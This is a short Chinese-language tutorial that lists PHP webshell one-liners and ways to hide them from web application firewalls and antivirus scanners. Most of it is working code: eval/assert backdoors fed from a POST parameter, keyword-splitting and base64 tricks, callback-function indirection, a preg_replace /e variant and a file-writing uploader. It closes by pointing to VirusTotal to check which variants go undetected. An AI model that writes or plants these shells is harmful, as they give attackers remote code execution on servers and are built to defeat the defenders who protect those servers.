1.动态免杀(assert.eval)

<?phpeval($_POST['haha']);?>
<?phpassert($_POST['haha']);?>

暗藏关键字(waf检测到assert,eval这个关键词,很大概率会被检测进去,那么咱们能够尝试用别的词来生成,具体的生成形式有很多种,这里列举一下常见的几种形式,其实成果都差不多。)

-1拆解合并

<?php$a = "a"."s";$b = "e"."r"."t";$c = $a.$b;$c($_POST['haha']);?>
<?phpfunction fun1($a){    $a($_POST['haha']);}fun1(assert);?>
<?php  function fun1($a){  assert($a);  }  fun1($_POST['haha']);?>
<?phpclass me{    public $a = '';    function __destruct()    {         assert("$this->a");    }}$obj = new me;$obj->a = $_POST['haha'];?>

-2调用函数(利用各种函数如array_map、array_key、preg_replace、@call_user_func、substr_replace来暗藏关键字)

<?php@call_user_func(assert,$_POST['haha']);?>
<?php$a = substr_replace("assexx","rt",4);$a($_POST['haha']);?>
<?php$a = $_REQUEST['haha'];$b = "\n";?>
<?phpfunction fun(){    return $_POST['haha'];}@preg_replace("/nihao/e",fun(),"nihao woshi zj");?>
<?phpif(isset($_POST['file'])){    $d = 'data';    $$d = $_POST['haha'];//$data    $f = 'fp';    $$f = fopen($_POST['file'],'wb');//$fp    echo fwrite($fp,$data)?'save success':'save fail';    fclose($fp);}?>

-3编码

<?php$a = base64_decode("YXNzZXJ0");$a($_POST['haha']);?>

-4冷门回调函数array_uintersect_uassoc函数来回调assert

<?php $password = "LandGrey"; array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert"); ?>

用该网站https://www.virustotal.com/测试